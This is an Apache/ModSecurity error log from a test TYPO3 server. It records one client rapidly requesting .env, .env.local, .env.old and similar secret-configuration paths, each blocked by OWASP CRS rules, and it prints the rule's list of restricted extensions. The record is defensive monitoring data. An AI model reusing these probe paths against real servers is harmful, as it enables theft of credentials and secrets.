[Thu Dec 18 03:27:49.587964 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4wAAAAM"]
[Thu Dec 18 03:27:49.588117 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4wAAAAM"]
[Thu Dec 18 03:27:49.588258 2025] [:error] [pid 813019] [client 45.148.10.160:53492] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUNmpTZTDxRxH4PwP3Sg4wAAAAM"]
[Thu Dec 18 03:27:49.624737 2025] [authz_core:error] [pid 813019] [client 45.148.10.160:53492] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Thu Dec 18 03:27:53.233062 2025] [:error] [pid 813359] [client 45.148.10.160:53630] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNmqbjsQ2OAT5oMPR4t_AAAAAc"]
[Thu Dec 18 03:27:53.233278 2025] [:error] [pid 813359] [client 45.148.10.160:53630] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNmqbjsQ2OAT5oMPR4t_AAAAAc"]
[Thu Dec 18 03:27:53.233440 2025] [:error] [pid 813359] [client 45.148.10.160:53630] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNmqbjsQ2OAT5oMPR4t_AAAAAc"]
[Thu Dec 18 03:27:55.734590 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0QAAAAQ"]
[Thu Dec 18 03:27:55.734819 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0QAAAAQ"]
[Thu Dec 18 03:27:55.734984 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0QAAAAQ"]
[Thu Dec 18 03:27:55.809978 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0gAAAAQ"]
[Thu Dec 18 03:27:55.810176 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0gAAAAQ"]
[Thu Dec 18 03:27:55.810326 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0gAAAAQ"]
[Thu Dec 18 03:27:55.871369 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0wAAAAQ"]
[Thu Dec 18 03:27:55.871582 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0wAAAAQ"]
[Thu Dec 18 03:27:55.871746 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf0wAAAAQ"]
[Thu Dec 18 03:27:55.928446 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf1AAAAAQ"]
[Thu Dec 18 03:27:55.928649 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf1AAAAAQ"]
[Thu Dec 18 03:27:55.928808 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/config/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf1AAAAAQ"]
[Thu Dec 18 03:27:55.980783 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/shared/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf1QAAAAQ"]
[Thu Dec 18 03:27:55.981192 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf1QAAAAQ"]
[Thu Dec 18 03:27:55.981343 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/shared/.env"] [unique_id "aUNmqwYcu7B8Gvtr6mOf1QAAAAQ"]
[Thu Dec 18 03:27:56.194988 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env_example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2AAAAAQ"]
[Thu Dec 18 03:27:56.195182 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2AAAAAQ"]
[Thu Dec 18 03:27:56.195351 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node/.env_example"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2AAAAAQ"]
[Thu Dec 18 03:27:56.255408 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2QAAAAQ"]
[Thu Dec 18 03:27:56.255600 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2QAAAAQ"]
[Thu Dec 18 03:27:56.255759 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production.local"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2QAAAAQ"]
[Thu Dec 18 03:27:56.318915 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2gAAAAQ"]
[Thu Dec 18 03:27:56.319099 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2gAAAAQ"]
[Thu Dec 18 03:27:56.319263 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2gAAAAQ"]
[Thu Dec 18 03:27:56.364686 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2wAAAAQ"]
[Thu Dec 18 03:27:56.366092 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2wAAAAQ"]
[Thu Dec 18 03:27:56.366278 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aUNmrAYcu7B8Gvtr6mOf2wAAAAQ"]
[Thu Dec 18 03:27:56.423461 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUNmrAYcu7B8Gvtr6mOf3AAAAAQ"]
[Thu Dec 18 03:27:56.423632 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUNmrAYcu7B8Gvtr6mOf3AAAAAQ"]
[Thu Dec 18 03:27:56.423779 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUNmrAYcu7B8Gvtr6mOf3AAAAAQ"]
[Thu Dec 18 03:27:56.573194 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNmrAYcu7B8Gvtr6mOf3gAAAAQ"]
[Thu Dec 18 03:27:56.573305 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNmrAYcu7B8Gvtr6mOf3gAAAAQ"]
[Thu Dec 18 03:27:56.573502 2025] [:error] [pid 813020] [client 45.148.10.160:53636] [client 45.148.10.160] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aUNmrAYcu7B8Gvtr6mOf3gAAAAQ"]
